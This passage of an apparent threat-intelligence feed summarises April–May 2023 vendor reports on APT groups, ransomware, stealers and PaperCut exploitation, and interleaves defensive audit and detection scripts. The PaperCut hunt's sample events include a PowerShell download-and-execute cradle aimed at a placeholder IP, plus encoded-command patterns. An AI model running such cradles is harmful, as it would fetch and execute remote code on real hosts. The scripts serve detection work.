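    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield (key_type, fingerprint, comment) per key line; comments and blanks skipped.
    Leading options (e.g. command=...) are skipped by locating the key-type field;
    an option value containing spaces would need a quote-aware split."""
    for line in text.splitlines():
        fields = line.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        yield fields[idx], key_fingerprint(fields[idx + 1]), " ".join(fields[idx + 2:])


def unknown_keys(text, known_fingerprints):
    """Key entries whose fingerprint is not in the inventory of issued keys."""
    return [(t, fp, c) for t, fp, c in parse_authorized_keys(text) if fp not in known_fingerprints]


if __name__ == "__main__":
    for name, reason in suspicious_accounts(SAMPLE_PASSWD):
        print(f"account {name}: {reason}")
    # An empty inventory reports every key; in practice load the fingerprints you issued.
    for key_type, fp, comment in unknown_keys(SAMPLE_AUTHORIZED_KEYS, set()):
        print(f"unknown key {key_type} {fp} {comment}")
```

Run it against the real files (`/etc/passwd` and every `~/.ssh/authorized_keys`, not only root's) and feed `unknown_keys` the fingerprints your provisioning system issued; comments in authorized_keys are free text and are not evidence of anything, which is why the comparison is on fingerprints.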
—
- Intel Source:
- Prodaft
- Intel Name:
- Russian_APT_Hacked_Tajikistani_Carrier_to_Spy_on_Government_and_Public_Services
- Date of Scan:
- 2023-05-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Prodaft have observed a Russian espionage group tracked as Nomadic Octopus spying on Tajikistan’s high-ranking government officials, public service infrastructures, and telecoms services, likely by infiltrating a mobile phone carrier.
Source:
https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf
—
- Intel Source:
- PaloAlto
- Intel Name:
- Internet_Threats_Are_Impersonating_Common_Industries_via_Phishing_Attacks_Web_Skimmer_Analysis_and_Many_More
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- PaloAlto researchers have surveyed the internet threat landscape, analyzing malicious URL distribution, geolocation, category analysis, and statistics on attempted malware attacks. The report also covers the industry sectors spoofed in phishing pages, downloaded malware statistics, injected JavaScript malware analysis, and malicious DNS analysis.
Source:
https://unit42.paloaltonetworks.com/internet-threats-late-2022/
—
- Intel Source:
- Cyble
- Intel Name:
- Malware_Families_Leveraging_AresLoader_for_Distribution
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a new loader called AresLoader that is used to spread several types of malware families. It is a loader malware written in the C programming language that first emerged in cybercrime forums and Telegram channels in 2022.
—
- Intel Source:
- Guardio
- Intel Name:
- The_Unstoppable_Malverposting_Continues
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- In this post Guardio researchers share the large number of IOC detections for malverposting, along with a detailed analysis of one campaign that uses adult-rated clickbait to deliver sophisticated malware, making it harder to detect and easy to mass-propagate.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Overview_of_UNIZA_Ransomware
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered a new ransomware variant called UNIZA. Like other ransomware variants, it uses a Command Prompt (cmd.exe) window to display its ransom message; interestingly, it does not append an extension to the files it encrypts, making it more difficult to determine which files have been impacted.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-uniza-coverage
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Family_Rapture_is_Similar_to_Paradise
- Date of Scan:
- 2023-05-01
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. The findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.
—
- Intel Source:
- Elastic
- Intel Name:
- New_LOBSHOT_Malware_Deploying_Via_Google_Ads
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Researchers from Elastic Security Labs have observed a malware family called LOBSHOT that continues to collect victims while remaining undetected. Its infrastructure is attributed to TA505, the well-known cybercriminal group associated with Dridex, Locky, and Necurs campaigns.
Source:
https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware
—
- Intel Source:
- Trellix
- Intel Name:
- Threat_Actors_Leveraging_SEO_Poisoning
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Trellix researchers have identified that hackers continue to innovate their techniques to infect victims, with SEO poisoning being one of the recent trends.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Statistics
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- The ASEC analysis team uses its automatic analysis system, RAPIT, to categorize and respond to known malware. This post lists weekly statistics collected from November 21st, 2022 (Monday) to November 27th (Sunday).
—
- Intel Source:
- Mitiga
- Intel Name:
- A_malicious_Mitiga_document
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- In January, an attacker uploaded a malicious .docx file to VirusTotal. The attacker used several of Mitiga's publicly available branding elements, including its logo, fonts, and colors, to lend credibility to the document.
Source:
https://www.mitiga.io/blog/mitiga-advisory-virus-total
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_analyses_April_9_15th_2023
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypots. Their post shares the cases of phishing email distribution observed during the week from April 9th, 2023 to April 15th, 2023 and provides statistical information on each type.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- An_Ongoing_Magecart_Campaign
- Date of Scan:
- 2023-04-30
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified an ongoing Magecart campaign that is leveraging realistic-looking fake payment screens to capture sensitive data entered by unsuspecting users.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_From_APT28_Group_Distributing_Emails_With_Instructions_on_Updating_OS
- Date of Scan:
- 2023-04-30
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have observed the distribution of emails with the subject “Windows Update”, allegedly sent on behalf of departmental system administrators. The sender addresses, created on the public @outlook.com service, may be formed from the real name and initials of an employee.
—
- Intel Source:
- Bitdefender
- Intel Name:
- The_BellaCiao_Malware_of_Iran
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- BitDefender researchers have observed the modernization of Charming Kitten’s tactics, techniques, and procedures, including a new, previously unseen malware. This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.
Source:
https://businessinsights.bitdefender.com/unpacking-bellaciao-a-closer-look-at-irans-latest-malware
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_new
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.
—
- Intel Source:
- Aqua
- Intel Name:
- The_Exploiting_of_Kubernetes_RBAC_by_attackers
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Aqua researchers have observed new evidence that attackers are exploiting Kubernetes (K8s) Role-Based Access Control (RBAC) in the wild to create backdoors. The attackers also attempted to launch DaemonSets to take control of and seize resources from the K8s clusters they attack. Aqua suspects that this campaign is actively targeting at least 60 clusters in the wild.
Source:
https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
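Aqua's entry above describes two persistence artefacts, RBAC bindings and DaemonSets. As an added example (not Aqua's code or the page's), the script below audits an exported cluster inventory for both: subjects bound to cluster-admin or to any ClusterRole with wildcard rules, and DaemonSets missing from a known-good list. The inventory, every object name in it, the allowlist and the baseline are constructed assumptions.

```python
"""Audit Kubernetes RBAC bindings and DaemonSets for backdoor-style persistence.

Added example, not Aqua's code. Input has the shape of
`kubectl get clusterroles,clusterrolebindings,daemonsets -A -o json`: a v1 List
whose items carry `kind`, `metadata`, and `rules`, `roleRef`/`subjects`, or a
DaemonSet `spec`. The inventory below is constructed; its names are hypothetical.
"""
import json

# Subjects that legitimately hold cluster-admin on a stock cluster (assumed allowlist).
DEFAULT_ALLOWED_SUBJECTS = {("Group", "", "system:masters")}
# Known-good DaemonSets as (namespace, name); anything else is reported (assumed baseline).
DEFAULT_DAEMONSET_BASELINE = {("kube-system", "kube-proxy")}


def grants_everything(rules):
    """True if a rule set is cluster-admin equivalent: '*' verbs on '*' resources."""
    return any("*" in r.get("verbs", []) and "*" in r.get("resources", []) for r in rules or [])

def privileged_cluster_roles(items):
    """Names of ClusterRoles with unrestricted access: cluster-admin plus lookalikes."""
    names = {"cluster-admin"}
    for obj in items:
        if obj.get("kind") == "ClusterRole" and grants_everything(obj.get("rules")):
            names.add(obj["metadata"]["name"])
    return names

def subject_key(subject):
    """(kind, namespace, name); namespace is '' for User and Group subjects."""
    return (subject.get("kind"), subject.get("namespace", ""), subject.get("name"))

def find_rbac_backdoors(items, allowed_subjects=DEFAULT_ALLOWED_SUBJECTS):
    """(binding, kind, namespace, name) for each subject bound to an unrestricted
    ClusterRole and not on the allowlist. No namespace is trusted: a backdoor
    ServiceAccount can sit in kube-system under a system-looking name."""
    privileged = privileged_cluster_roles(items)
    findings = []
    for obj in items:
        if obj.get("kind") != "ClusterRoleBinding":
            continue
        if obj.get("roleRef", {}).get("name") not in privileged:
            continue
        for subject in obj.get("subjects", []):
            key = subject_key(subject)
            if key not in allowed_subjects:
                findings.append((obj["metadata"]["name"],) + key)
    return findings

def find_unexpected_daemonsets(items, baseline=DEFAULT_DAEMONSET_BASELINE):
    """(namespace, name, images) for every DaemonSet absent from the baseline.
    A DaemonSet places a pod on every node, which is why it suits resource theft."""
    findings = []
    for obj in items:
        if obj.get("kind") != "DaemonSet":
            continue
        ns, name = obj["metadata"]["namespace"], obj["metadata"]["name"]
        if (ns, name) in baseline:
            continue
        containers = obj["spec"]["template"]["spec"].get("containers", [])
        findings.append((ns, name, [c.get("image", "") for c in containers]))
    return findings


# Constructed inventory: the stock admin binding, two backdoor bindings (one hiding
# in kube-system under a system-style name), a harmless read-only binding, the stock
# kube-proxy DaemonSet and one DaemonSet that is not in the baseline.
SAMPLE_INVENTORY = json.loads("""
{"kind": "List", "items": [
 {"kind": "ClusterRole", "metadata": {"name": "cluster-admin"},
  "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "cluster-ops"},
  "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "node-reader"},
  "rules": [{"apiGroups": [""], "resources": ["nodes"], "verbs": ["get", "list"]}]},
 {"kind": "ClusterRoleBinding", "metadata": {"name": "cluster-admin"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "Group", "name": "system:masters"}]},
 {"kind": "ClusterRoleBinding", "metadata": {"name": "system:controller:kube-controller"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "ServiceAccount", "namespace": "kube-system", "name": "kube-controller"}]},
 {"kind": "ClusterRoleBinding", "metadata": {"name": "ops-admin"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-ops"},
  "subjects": [{"kind": "ServiceAccount", "namespace": "default", "name": "ops"}]},
 {"kind": "ClusterRoleBinding", "metadata": {"name": "node-readers"},
  "roleRef": {"kind": "ClusterRole", "name": "node-reader"},
  "subjects": [{"kind": "ServiceAccount", "namespace": "monitoring", "name": "exporter"}]},
 {"kind": "DaemonSet", "metadata": {"namespace": "kube-system", "name": "kube-proxy"},
  "spec": {"template": {"spec": {"containers": [{"name": "kube-proxy", "image": "registry.k8s.io/kube-proxy:v1.27.1"}]}}}},
 {"kind": "DaemonSet", "metadata": {"namespace": "kube-system", "name": "kube-controller"},
  "spec": {"template": {"spec": {"containers": [{"name": "kube-controller", "image": "docker.io/example/kube-controller:latest"}]}}}}
]}
""")

if __name__ == "__main__":
    items = SAMPLE_INVENTORY["items"]
    for binding, kind, ns, name in find_rbac_backdoors(items):
        print(f"unrestricted binding {binding}: {kind} {ns + '/' if ns else ''}{name}")
    for ns, name, images in find_unexpected_daemonsets(items):
        print(f"unexpected DaemonSet {ns}/{name}: {', '.join(images)}")
```

The allowlist is deliberately exact (kind, namespace, name) rather than "anything in kube-system", because a system namespace and a system-looking name are exactly what an attacker would choose; keep the DaemonSet baseline in version control and diff against it on a schedule.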
—
- Intel Source:
- Uptycs
- Intel Name:
- RTM_Locker_Ransomware_as_a_Service_Now_Suits_Linux_Architecture
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Uptycs researchers have discovered a new ransomware binary attributed to the RTM group, a known ransomware-as-a-service (RaaS) provider. This is the first time the group has created a Linux binary. Its locker ransomware infects Linux, NAS, and ESXi hosts and appears to be inspired by Babuk ransomware’s leaked source code.
Source:
https://www.uptycs.com/blog/rtm-locker-ransomware-as-a-service-raas-linux
—
- Intel Source:
- PaloAlto
- Intel Name:
- PingPull_Malware_is_Updated_by_Chinese_Alloy_Taurus
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Unit 42 researchers have identified a new variant of PingPull malware used by Alloy Taurus actors and designed to target Linux systems. While following the infrastructure the actor leveraged for this PingPull variant, Unit 42 also identified their use of another backdoor it tracks as Sword2033.
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Selling_New_Atomic_macOS_Stealer_on_Telegram
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Cyble Researchers have discovered a Telegram channel advertising a new information-stealing malware called Atomic macOS Stealer (AMOS). The malware is specifically designed to target macOS and can steal sensitive information from the victim’s machine.
Source:
https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/
—
- Intel Source:
- TrendMicro
- Intel Name:
- TrafficStealer_Abusing_Open_Container_APIs
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have discovered a different type of attack: a piece of software that leverages Docker containers to generate money through monetized traffic. Although the software itself appears legitimate, it likely has compromised components that result in its being flagged as a potentially unwanted application.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- APT_Group_Panda_Delivering_Malware_via_Software_Updates
- Date of Scan:
- 2023-04-27
- Impact:
- HIGH
- Summary:
- ESET researchers discovered a new campaign by the APT group known as Evasive Panda targeting an international NGO in China with malware delivered through updates of popular Chinese software.
—
- Intel Source:
- Cyble
- Intel Name:
- PaperCut_actively_exploited_in_the_Wild
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- Earlier this month, PaperCut published a security alert stating that it has evidence of unpatched servers being exploited in the wild, and a Russian threat actor is suspected of exploiting the vulnerability. The vendor advisories cover two CVEs: CVE-2023-27350 (severity: Critical) and CVE-2023-27351 (severity: High). Cyble researchers shared their analysis of both in their post.
Source:
https://blog.cyble.com/2023/04/25/print-management-software-papercut-actively-exploited-in-the-wild/
—
- Intel Source:
- ASEC
- Intel Name:
- RokRAT_Malware_Distributing_Through_LNK_Files
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK files.
—
- Intel Source:
- Zero Day Initiative (ZDI)
- Intel Name:
- New_the_Mirai_botnet_exploit
- Date of Scan:
- 2023-04-26
- Impact:
- MEDIUM
- Summary:
- The Zero Day Initiative threat-hunting team recently discovered new exploit attempts in Eastern Europe showing that the Mirai botnet has been updated to exploit CVE-2023-1389 (ZDI-CAN-19557/ZDI-23-451) in the TP-Link Archer AX21 Wi-Fi router. The vulnerability was originally disclosed to ZDI during the Pwn2Own Toronto event, where Team Viettel used it in their LAN-side entry against the TP-Link device and Qrious Security used it in their WAN-side entry.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Phishing_Attack_Increasing_in_Singapore_for_Tax_Portal
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified a legitimate-looking IRAS phishing website that asks users to input their Singapore Personal Access (Singpass) credentials, which are used to access government and private services (such as banking) in Singapore.
Source:
https://isc.sans.edu/diary/Strolling+through+Cyberspace+and+Hunting+for+Phishing+Sites/29780/
—
- Intel Source:
- Infoblox
- Intel Name:
- Finding_Decoy_Dog_Toolkit_via_Anomalous_DNS_Traffic
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from Infoblox have identified a new malware toolkit named Decoy Dog that allows attackers to avoid standard detection techniques and target enterprises. It uses DNS query dribbling and strategic domain aging to bypass security checks.
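Query dribbling, as used by Decoy Dog above, is a low, steady trickle of lookups stretched over a long period. The added example below (not Infoblox's detection logic) shows the aggregation a defender would run over resolver logs: per registered domain, count active days, lookups per active day and distinct clients, then flag domains that persist for many days at very low volume from very few hosts. The log lines, domain names and thresholds are constructed assumptions; domain aging needs registration data and is not covered here.

```python
"""Flag DNS 'query dribbling': a domain that one host resolves at a low, steady rate
over many days, the shape of a patient beacon rather than of normal browsing.

Added example, not Infoblox's detection logic. The resolver log is constructed in a
`timestamp client qname` shape; domain names and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_log():
    """Construct 14 days of synthetic resolver lines (not real traffic)."""
    start = datetime(2023, 4, 1, 8, 0, 0)
    lines = []
    for day in range(14):
        base = start + timedelta(days=day)
        # the dribble: one lookup a day, one host, same registered domain
        lines.append(f"{(base + timedelta(hours=day % 5)).isoformat()} 10.0.0.5 a1b2.cdn-sync.net")
        # ordinary busy domain: many hosts, many lookups
        for host in ("10.0.0.5", "10.0.0.6", "10.0.0.7"):
            for i in range(30):
                lines.append(f"{(base + timedelta(minutes=i)).isoformat()} {host} www.example.com")
        # moderately busy API domain from one host
        for i in range(12):
            lines.append(f"{(base + timedelta(minutes=2 * i)).isoformat()} 10.0.0.6 api.example-api.org")
    # a one-off lookup: low volume but not persistent, so not a dribble
    lines.append(f"{(start + timedelta(days=3)).isoformat()} 10.0.0.7 news.example.info")
    return lines


def registered_domain(qname):
    """Last two labels. A production version should use the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_line(line):
    ts, client, qname = line.split()
    return datetime.fromisoformat(ts), client, qname


def find_dribbling(lines, min_days=7, max_per_day=3.0, max_clients=2):
    """(domain, active_days, total_queries, clients) for domains seen on at least
    min_days distinct days, at no more than max_per_day lookups per active day,
    from at most max_clients hosts. Tune the thresholds to your own baseline."""
    active_days, totals, clients = defaultdict(set), defaultdict(int), defaultdict(set)
    for line in lines:
        ts, client, qname = parse_line(line)
        dom = registered_domain(qname)
        active_days[dom].add(ts.date())
        totals[dom] += 1
        clients[dom].add(client)
    findings = []
    for dom, days in active_days.items():
        per_day = totals[dom] / len(days)
        if len(days) >= min_days and per_day <= max_per_day and len(clients[dom]) <= max_clients:
            findings.append((dom, len(days), totals[dom], sorted(clients[dom])))
    return sorted(findings)


if __name__ == "__main__":
    for dom, days, total, hosts in find_dribbling(build_sample_log()):
        print(f"{dom}: {total} lookups over {days} days from {', '.join(hosts)}")
```

Aggregating on the registered domain rather than the full query name matters because a beacon typically rotates subdomains; run the aggregation over at least a few weeks of logs, since the whole point of dribbling is that any single day looks empty.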
—
- Intel Source:
- ASEC
- Intel Name:
- Tonto_Team_Using_Anti_Malware_Related_Files_for_DLL_Side_Loading
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that the Tonto Team threat group, which mainly targets Asian countries, has been distributing Bisonal malware using anti-malware-related files for DLL side-loading.
—
- Intel Source:
- Securelist
- Intel Name:
- The_Analysis_of_Tomiris_Group
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Securelist researchers have continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023 and it is targeting government and diplomatic entities in the CIS.
Source:
https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/
—
- Intel Source:
- Cofense
- Intel Name:
- After_15_Years_release_Open_Source_Gh0st_RAT_still_Haunting_Inboxes
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- The Cofense Intelligence Unit discovered Gh0st RAT, an old open-source RAT, targeting a healthcare organization. Gh0st RAT was created by a Chinese hacking group, the C. Rufus Security Team, and the public release of its source code made it easy for threat actors to adopt. Its capabilities include taking full control of the infected machine, recording keystrokes in real time with offline logging, accessing live webcam feeds and microphone recordings, downloading files remotely, remote shutdown and reboot, and disabling user input.
Source:
https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/
—
- Intel Source:
- Checkpoint
- Intel Name:
- New_Findings_of_Educated_Manticore
- Date of Scan:
- 2023-04-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Check Point have revealed new findings on an activity cluster closely related to Phosphorus. It presents a new and improved infection chain leading to the deployment of a new version of PowerLess. This implant was previously attributed to Phosphorus, an Iran-affiliated threat group operating in the Middle East and North America.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Repurposing_Package_Name_on_PyPI_to_Push_Malware
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Researchers from ReversingLabs have observed a malicious package on the Python Package Index (PyPI) named termcolour, a three-stage downloader published in multiple versions.
Source:
https://www.reversinglabs.com/blog/package-names-repurposed-to-push-malware-on-pypi
—
- Intel Source:
- Huntress
- Intel Name:
- Zero_Day_Vulnerabilities_in_PaperCut_Print_Management_Software
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Researchers from Huntress have tracked the exploitation of zero-day vulnerabilities against PaperCut MF/NG which allow for unauthenticated remote code execution due to an authentication bypass.
Source:
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
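Both PaperCut entries on this page (Cyble above and Huntress here) concern an authentication bypass that yields unauthenticated code execution on the print server. As an added example (not Huntress's or Cyble's detection), the script below runs the process-lineage hunt a defender would apply to Sysmon-style process-creation events: the PaperCut application server process spawning a command interpreter or script host, with higher severity when the command line shows encoded-command or download-cradle patterns. The parent name pc-app.exe, the child list, the regex and the events are assumptions to verify against your own deployment.

```python
"""Hunt for post-exploitation on a PaperCut MF/NG server: the application server
process spawning a command interpreter or script host.

Added example, not Huntress's or Cyble's detection. Events are constructed in a
minimal Sysmon-like shape. pc-app.exe as the server process, the child list and
the command-line patterns are assumptions to verify against your own deployment.
"""
import re

PAPERCUT_PARENTS = {"pc-app.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
# Encoded commands and download cradles raise the severity of a hit.
CRADLE_RE = re.compile(r"(?i)(-enc(odedcommand)?\s|-e\s+[A-Za-z0-9+/=]{20,}|downloadstring|"
                       r"invoke-webrequest|\biwr\b|\biex\b|frombase64string)")


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a finding dict if the PaperCut server spawned a shell-like child, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in PAPERCUT_PARENTS or child not in SHELL_CHILDREN:
        return None  # other children (print helpers, conhost) are expected noise
    cmdline = event.get("CommandLine", "")
    severity = "high" if CRADLE_RE.search(cmdline) else "medium"
    return {"host": event.get("Computer", "?"), "time": event.get("UtcTime", "?"),
            "child": child, "severity": severity, "cmdline": cmdline}


def hunt(events):
    """Findings for a batch of process-creation events, in input order."""
    return [hit for hit in map(classify, events) if hit]


# Constructed events: two cradles, one plain recon command, one benign child
# and one shell whose parent is not PaperCut.
SAMPLE_EVENTS = [
    {"UtcTime": "2023-04-18 02:11:03.120", "Computer": "PRINT01",
     "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -enc SQBFAFgAIABOAGUAdwAtAE8AYgBqAGUAYwB0AA=="},
    {"UtcTime": "2023-04-18 02:11:09.455", "Computer": "PRINT01",
     "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\""},
    {"UtcTime": "2023-04-18 02:12:40.002", "Computer": "PRINT01",
     "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe",
     "Image": "C:\\Windows\\System32\\conhost.exe",
     "CommandLine": "\\??\\C:\\Windows\\system32\\conhost.exe 0x4"},
    {"UtcTime": "2023-04-18 09:30:00.000", "Computer": "PRINT01",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe"},
    {"UtcTime": "2023-04-18 02:13:12.777", "Computer": "PRINT01",
     "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami /all"},
]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"[{hit['severity']}] {hit['host']} {hit['time']} {hit['child']}: {hit['cmdline']}")
```

A medium hit is still worth a look: the server process has no business launching cmd.exe at all, so the lineage alone is the signal and the command-line patterns only order the queue. Pair the hunt with patching, since detection after the fact does not remove the unauthenticated entry point.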
—
- Intel Source:
- TrendMicro
- Intel Name:
- ViperSoftX_Encryption_Updates
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- TrendMicro researchers have observed the cryptocurrency and information stealer ViperSoftX evading initial loader detection and making its lure more believable by shipping a non-malicious initial package loader via cracks, keygens, activators, and packers.
Source:
https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html
—
- Intel Source:
- Cyble
- Intel Name:
- The_QakBot_Malware_Continues_to_Evolve
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Cyble Research Intelligence Labs have observed that several malware families, such as AsyncRAT, QuasarRAT, DCRAT, etc., have been found using OneNote attachments as part of their tactics. In February 2023, the well-known malware, Qakbot, started using OneNote attachments in their spam campaigns.
Source:
https://blog.cyble.com/2023/04/21/qakbot-malware-continues-to-morph/
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_OCX_HARVESTER_Attack_Campaign_Using_Modernized_More_Eggs_Suite
- Date of Scan:
- 2023-04-24
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs researchers have observed a new attack campaign tracked as OCX#HARVESTER. Some of the malicious payloads leveraged as part of the attack campaign observed appear to be related to the More_eggs malicious payloads reported earlier.
—
- Intel Source:
- Symantec
- Intel Name:
- X_Trader_Supply_Chain_Attack_Affecting_Critical_Infrastructure_Organizations_in_US_and_Europe
- Date of Scan:
- 2023-04-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have identified that North Korean-linked operations affected more organizations beyond 3CX, including two critical infrastructure organizations in the energy sector.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain
—
- Intel Source:
- Jamf
- Intel Name:
- BlueNoroff_APT_Group_Targeting_macOS_With_RustBucket_Malware
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Jamf Threat Labs have discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. They track and protect against this malware family under the name ‘RustBucket’ and suspect it to be attributed to a North Korean, state-sponsored threat actor.
Source:
https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Lazarus_Hackers_Pushing_Linux_Malware_via_Fake_Job_Offers
- Date of Scan:
- 2023-04-22
- Impact:
- MEDIUM
- Summary:
- ESET researchers (WeLiveSecurity) have identified a new Lazarus campaign, considered part of “Operation DreamJob”, that targets Linux users with malware for the first time.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Scams_Involving_ChatGPT_Are_on_the_Rise
- Date of Scan:
- 2023-04-22
- Impact:
- LOW
- Summary:
- Unit42 researchers have monitored the newly registered domains and squatting domains related to ChatGPT, as it is one of the fastest-growing consumer applications in history. The dark side of this popularity is that ChatGPT is also attracting the attention of scammers seeking to benefit from using wording and domain names that appear related to the site.
Source:
https://unit42.paloaltonetworks.com/chatgpt-scam-attacks-increasing/
—
- Intel Source:
- Sophos
- Intel Name:
- Two_New_QakBot_C2_Servers_Detected
- Date of Scan:
- 2023-04-22
- Impact:
- LOW
- Summary:
- Sophos researchers have detected two new QakBot servers that have not yet been publicly identified. These servers are used by threat actors to manage and control QakBot infections, a banking trojan that has been active since 2008 and primarily targets financial institutions and their customers.
Source:
https://news.sophos.com/en-us/2023/04/20/new-qakbot-c2-servers-detected-with-sophos-ndr/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Examination_of_EvilExtractor_Tool
- Date of Scan:
- 2023-04-22
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs researchers have analyzed EvilExtractor, an attack tool designed to target Windows operating systems and extract data and files from endpoint devices. They also observed this malware in a phishing email campaign on 30 March.
Source:
https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_the_BlackBit_ransomware
